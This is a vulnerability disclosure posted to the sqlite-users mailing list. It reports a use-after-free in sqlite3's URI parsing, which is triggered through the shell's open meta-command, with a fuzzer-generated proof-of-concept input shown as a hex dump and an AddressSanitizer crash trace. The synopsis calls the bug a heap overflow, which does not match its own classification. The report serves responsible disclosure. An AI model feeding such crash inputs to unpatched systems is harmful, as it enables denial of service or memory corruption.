Dear Sqlite team,

Please find attached a second bug report for a use after free() in sqlite.

Kindest regards,
j-
---------------------------------------------------------------------------
* * * Sqlite3 use after free vulnerability * * *
---------------------------------------------------------------------------

--[ Vulnerability summary:

Date reported to vendor: 27 May 2016
CVE : Not yet
Class: Use after free()

--[ Synopsis:

A heap overflow has been identified in sqlite3.

Version tested : 3.8.9 2015-03-23 21:32:50 0ee2d38deb35aefc55395e86984a9a773caf6218

--[ Vulnerability details:

The sqlite3ParseUri() function is subject to a use after free() vulnerability.

--[ Exploitability:

The vulnerability can consistently be triggered using the PoC reproduced below. Successful exploitation is heap allocator dependent.

--[ Timeline:

27 May 2016 : Vulnerability reported to vendor.

--[ PoC:

jbrossard@jbrossard-wsl3:~$ xxd /tmp/poc1/poc2.txt
0000000: 2e20 6f70 204a 3378 147b 2929 2970 204a  . op J3x.{)))p J
0000010: 3378 147b 2929 290a 0a0a 0a0a 0a0a 0a0a  3x.{))).........
0000020: 0a0a 0a0a 0a0a 0a0a 3b0a 2e20 6f70 200a  ........;.. op .
0000030: 0a0a 0a0a 0a0a 0a0a 0a0a 0a0a 0a3b 0a2e  .............;..
0000040: 206f 7020 0a0a f60a 0a0a 0a0a 0a0a 0a0a   op ............
0000050: 0a0a 0a0a 0a3b 0a2e 206f 7020 2f20 529a  .....;.. op / R.
0000060: 293b 7020 2f20 529a 293b 206f 7420 2f3b  );p / R.); ot /;
0000070: 272e 106f 7020 7814 7b00 1018 0a2e 206f  '..op x.{..... o
0000080: 7020 2f20 4d9a                           p / M.
jbrossard@jbrossard-wsl3:~$

Note: You might need to compile with a memory allocator monitor such as AddressSanitizer, or run the application after setting the MALLOC_CHECK environment variable, in order to catch this vulnerability.
jbrossard@jbrossard-wsl3:~/lab/fuzzing/results/sqlite_0days$ ../../sqlite3/bin/sqlite3_afl32_asan < /tmp/poc1/poc2.txt
=================================================================
==19089==ERROR: AddressSanitizer: heap-use-after-free on address 0xf5600550 at pc 0x82c3389 bp 0xffcb3618 sp 0xffcb360c
READ of size 1 at 0xf5600550 thread T0
    #0 0x82c3388 in sqlite3Strlen30 /home/jbrossard/lab/sqlite3/build/sqlite3.c:23459
    #1 0x82c3388 in sqlite3ParseUri /home/jbrossard/lab/sqlite3/build/sqlite3.c:129866
    #2 0x83e4117 in openDatabase /home/jbrossard/lab/sqlite3/build/sqlite3.c:130235
    #3 0x806c9fe in open_db /home/jbrossard/lab/sqlite3/build/../src/shell.c:1910
    #4 0x8092940 in open_db /home/jbrossard/lab/sqlite3/build/../src/shell.c:3249
    #5 0x8092940 in do_meta_command /home/jbrossard/lab/sqlite3/build/../src/shell.c:3254
    #6 0x80967a8 in process_input /home/jbrossard/lab/sqlite3/build/../src/shell.c:4077
    #7 0x8062f98 in main /home/jbrossard/lab/sqlite3/build/../src/shell.c:4694
    #8 0xf70d64d2 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x194d2)
    #9 0x8065148 (/home/jbrossard/lab/fuzzing/sqlite3/bin/sqlite3_afl32_asan+0x8065148)

0xf5600550 is located 0 bytes inside of 16-byte region [0xf5600550,0xf5600560)
freed by thread T0 here:
    #0 0xf72d61c4 in __interceptor_free ../../../../../libsanitizer/asan/asan_malloc_linux.cc:62
    #1 0x80b9d1c in sqlite3_free /home/jbrossard/lab/sqlite3/build/sqlite3.c:20942
    #2 0x809288b in do_meta_command /home/jbrossard/lab/sqlite3/build/../src/shell.c:3257
    #3 0x80967a8 in process_input /home/jbrossard/lab/sqlite3/build/../src/shell.c:4077
    #4 0x8062f98 in main /home/jbrossard/lab/sqlite3/build/../src/shell.c:4694
    #5 0xf70d64d2 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x194d2)

previously allocated by thread T0 here:
    #0 0xf72d63e4 in __interceptor_malloc ../../../../../libsanitizer/asan/asan_malloc_linux.cc:72
    #1 0x821a3c2 in sqlite3MemMalloc /home/jbrossard/lab/sqlite3/build/sqlite3.c:17064
    #2 0x810490b in mallocWithAlarm /home/jbrossard/lab/sqlite3/build/sqlite3.c:20733
    #3 0x810490b in sqlite3Malloc /home/jbrossard/lab/sqlite3/build/sqlite3.c:20764
    #4 0x81901d6 in sqlite3StrAccumFinish /home/jbrossard/lab/sqlite3/build/sqlite3.c:22122
    #5 0x82c082c in sqlite3_vmprintf /home/jbrossard/lab/sqlite3/build/sqlite3.c:22233
    #6 0x82c082c in sqlite3_mprintf /home/jbrossard/lab/sqlite3/build/sqlite3.c:22248
    #7 0x80926e8 in do_meta_command /home/jbrossard/lab/sqlite3/build/../src/shell.c:3252
    #8 0x80967a8 in process_input /home/jbrossard/lab/sqlite3/build/../src/shell.c:4077
    #9 0x8062f98 in main /home/jbrossard/lab/sqlite3/build/../src/shell.c:4694
    #10 0xf70d64d2 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x194d2)

SUMMARY: AddressSanitizer: heap-use-after-free /home/jbrossard/lab/sqlite3/build/sqlite3.c:23459 sqlite3Strlen30
Shadow bytes around the buggy address:
  0x3eac0050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3eac0060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3eac0070: fa fa fa fa fa fa 00 00 fa fa 00 00 fa fa 00 00
  0x3eac0080: fa fa 00 00 fa fa fd fd fa fa 00 00 fa fa 00 00
  0x3eac0090: fa fa 00 00 fa fa fd fd fa fa fd fd fa fa fd fd
=>0x3eac00a0: fa fa fd fd fa fa fd fd fa fa[fd]fd fa fa fd fd
  0x3eac00b0: fa fa 00 00 fa fa 00 fa fa fa 00 00 fa fa 00 fa
  0x3eac00c0: fa fa 00 00 fa fa 00 fa fa fa 00 00 fa fa 00 fa
  0x3eac00d0: fa fa 00 00 fa fa 00 04 fa fa 00 fa fa fa 00 00
  0x3eac00e0: fa fa 00 04 fa fa 00 fa fa fa 00 00 fa fa 00 04
  0x3eac00f0: fa fa 00 fa fa fa 00 00 fa fa 00 00 fa fa 00 fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Contiguous container OOB:fc
  ASan internal:           fe
==19089==ABORTING
jbrossard@jbrossard-wsl3:~/lab/fuzzing/results/sqlite_0days$
_______________________________________________
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users